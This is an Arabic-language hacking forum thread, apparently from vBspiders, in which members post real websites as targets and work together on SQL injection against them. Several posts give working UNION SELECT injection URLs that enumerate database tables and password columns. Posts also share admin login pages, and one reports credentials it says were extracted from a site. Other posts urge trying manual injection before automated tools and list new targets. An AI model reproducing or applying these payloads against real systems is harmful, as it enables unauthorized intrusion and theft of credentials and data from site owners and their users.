![]() |
اقتباس:
|
[align=center]الهدف الجديد سهل جدا جدا الموقع : http://abarab.com/profile_view.php?id=2 بالتوفيق ^_^ تحياتي [/align] |
اقتباس:
أخي الكريم راح أبدأ العمل على هذا الهدف فقط سؤال صغير بما أنك حقنته هل إسم عمود الباسوارد يشبه pas أو pass أو passwd أو password |
يا دارك بحثت في كل الجداول و لا عمود إسمه يشبه pass وجدت إسم عمود الإيميل و إسم عمود login و لم أجد الباسوارد غريبة يا ريت تضع لنا إسم عمود الباسوارد أو على الأقل قول لي هل يشبه pas لأني لم أجد أي كلمة تشبه pas بالتوفيق |
اقتباس:
أهلا حبيبي آسف ما شفت ردك لأني رديت بعده المهم هل الحقن يدوي ؟ |
اقتباس:
أنا أخبرتك أنني فتشته عمودا عمودا أخي system-32 الباش مشفر لم أجد (إذا كان الباس غير مشفر فأنا لم أنتبه .....و لم أجد أي كلمة تثير الريبة أو تشير إلى أنها خاصة بالباس) + أنا وجدت نفس اللي وجدتوه |
اقتباس:
بالنسبة لطريقة حقن جميع المواقع مش بس هذا... بالاول تحاول تحقنو يدوي اذا ما قدرت تحقنو يدويأ تنتظر غيرك ممكن يقدر يحقنو يدوي واذا ما في حدا قدر وقتها لا مانع من استخدام البرامج تحياتي[/align] |
اقتباس:
فهل حقنته يدويا أخي master vbspiders !!!!smilies4 |
Master vbspiders كبف حقنته أنت أخي يدوي أو بواسطة برنامج ؟؟؟؟ + هل أكملت الحقنة للأخير يدوي ؟؟؟؟؟ |
ببرنامج coder لم تنفع لم يبقى لدي سوى طريقة ال capital letters & small letters |
اقتباس:
انا ما حقنتو لكن جبتو من عند واحد صاحبي كان شغال عليه وقال حقنو سهل ونسيت اسالو شو كان عميستخدم بالحقن برامج ام يدوي الان حاولت احقنو يدوي لكن ما نفع راح اجرب بالبرامج تحياتي |
يعني حقنو ببرنامج هههههههههههههههه لانو فيه عمود واحد و البداية بال UNION SELECT و VERSION() مابيشنغلو يعني ماراح يشتغل |
[align=center]ههههه اكيد ببرنامج لان حاولت اكثر من مرة بس ما نفع.. الان حقنتو ببرنامج وهاي المعلومات : اليوزر : pappsy الباس : buddy من هنا الدخول http://abarab.com/login.php هههه قاعدة البيانات شكلها مضروبة عالاخير لان البرنامج ما طول اكثر من دقيقة بسحبها تحياتي [/align] |
اقتباس:
في انتظر الهدف الجــــــــــــــــــديـــــــــــد |
أخي ماستر صحيح أنا حقنته و إستخرجت نفس المعلومات من قبل ساعات لكن لم أشأ وضعها خوفا من إتجاه أصابع الإتهام إلي لوول بالتوفيق و أي شيء أنا هنا |
kanvi نورت الموضوع أخي |
اقتباس:
هههههههههههههههههههههه مازال راح تموت من الرعب ههههههههههههههههههههههههههه :37: |
ماكان أهداف ؟؟؟؟ |
اقتباس:
اصابع الاتهام ههههههههه عموما يا غاليين انا راح اغيب لمدة يومين ممممم بالنسبة لوضع الاهداف وهيك شي اعتقد الثنائي : ooooo_darkman_ooooo Syst3m-32 يقدرو يديروها.. اشوفكم بعد يومين ان شاء الله تحياتي [/align] |
اقتباس:
|
ترجع بالسلامة اخي ماستر تفضلوا الهدف الجديد http://www.shrinkingvioletonline.co....sc.php?id=2366 الموقع سهل جدا بس بدو شوي والله شكلو موقع هدايا او بيع ملابس مت بعرف هههه يلا منتظرالنتائج |
[align=center]منور حبيبي ... ممممم الموقع يعني مش صعب بس الاعمدة شوي كثيرة تم تخمين عمود الباس : كود PHP: مممم انا ما قدرت اخمن غير جدول الباس ولوحة التحكم : http://www.shrinkingvioletonline.co.uk/admin1/login.php الباقي عليكم بالتوفيق تحياتي [/align] |
قد استطعت استخراج الباص اما اليوزر فلم اجد عمود اليوزر بعد التخمين وهذه هى الحقنة http://www.shrinkingvioletonline.co....1+from+admin-- |
[align=center]ملاحضة حول موقع الاخ عبدالله ر لما بتصل لتخمين جدول اليوزر لا تبحث بالتخمينات عن هيك اسماء user , username & etc لان لوحة الدخول تطلب ايميل الادمن عند تسجيل الدخول وانا ايضا كنت اشك في عدم وجود اي جدول لليوزر ابدا التخمين من جديد وابحث عن جدول الايميلات بالتوفيق تحياتي [/align] |
السلام عليكم ورحمة الله تعالى وبركاته |
هل سبق وواجه أحد منكم موقع به 276 فاعدة بيانات متصلة ببعضها و فيه 11 عمود باسوورد مختلف !!!!!!!!!!!!!!! أعتقد أن الحظ إبتسم لي + الموقع موقع شوبينق shopping هههههههههههههههههههههههههههههههههههههههههههههههههه ههههه لكن راح أحطو لكم بعد الإنتهاء من فحصه كاملا |
اول موقع احطه فيه بعض الصعوبة http://energychoices.com/page_news_fullpage.php?id=1048 |
من يقدر على هدا http://apps.facebook.com/myhotdeals/...hp?promoid=150' تصدق ان الجداول تتغير كل ثانية لول |
[align=center] السلام عليكم هلا بيكم ثغرة الــ facebook صورة للحقنة http://files03.arb-up.com/i/00175/odh7x2bmdooj.jpg الاستغلال لازم اتحطو اخر الحقنة -- http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,version%28%29,user%28%29,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32---- http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,group_concat%28table_name,0x3a,column_name, 0x3a,table_schema%29,7,8,9,10,11,12,13,group_conca t%28table_name,0x3a,column_name,0x3a,table_schema% 29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32+from+information_schema.columns+where+colum n_name+LIKE+char%2837,%20112,%2097,%20115,%20115,% 2037%29---- http://apps.facebook.com/myhotdeals/...20101,%2037)--)-- [/align] الي يعرف ايكمل مايبخل علينا :) |
mercciiiiiiiiiiiiiiii |
اقتباس: شكرا لك اخي وهذا متوصلت اليه : معلمومات على الموقع: كود PHP: LIST TABLES كود PHP: كود PHP: كود PHP: كود PHP: كود PHP: كود PHP: magic_ qiotes كود PHP: |
اقتباس:
الرحلة اتلغت باقي معاكم طوال شهر رمضان الكريم وعليكم السلام ورحمة الله وبركاته منور حبيبي [/align] |
اقتباس:
بعد ما تفحصو ونحن نكمل حقن الاهداف الجديدة انت قم بوضعو... شكلو هدف نااار تحياتي[/align] |
[align=center] d4rK-h4ck3r شكرا على الاهداف اخي الكريم... king dragons نورت الغرفة شغل حلو واصل kanvi بارك الله فيك اخي الغالي على الحقنة الكاملة تم التقييم تحياتي [/align] |
اقتباس:
|
Back عودة من جديد هل من أهداف ؟ أو أضع لكم ؟ |
السلام عليكم هل من مواقع لتسخين اليدين هههههههههههههههههههههه |
اقتباس:
أنا حسب علمي المواقع التجارية معظمها مركب على سيرفرات خاصة وتقريبا تكون وحيدة على السيرفر لتجنب الإنتقال عبر المواقع المصابة و الوصول إليها |
اقتباس:
كلامك سليم لكن... احيانا الاستضافة تعمل باك اب لقواعد البيانات الخاصة بالمواقع الي موجودة على السيرفر الخاص فيها ولذلك ممكن تلقي قواعد بيانات متعددة وهيك اما بالنسبة للمواقع التجارية فلا اعلم عنها شي عموما انت قم بطرح الموقع وان شاء الله بنقدر نحقنو تحياتي لك[/align] |
ok لكن قبل كل شيئ هذا موقع أنا تأكدتمن أنه مصاب وكذلك وجدت أن عدد الأعمدة 9 لكن لم أجد الأعمدة المصابة أعتقد أنها في ال source الخاص بالصفحة و أنا لا أحب أبدا البحث فيه لذلك سأهديه لكم وها هو كود: http://www.pixheaven.net |
الساعة الآن 07:14 AM |
[ vBspiders.Com Network ]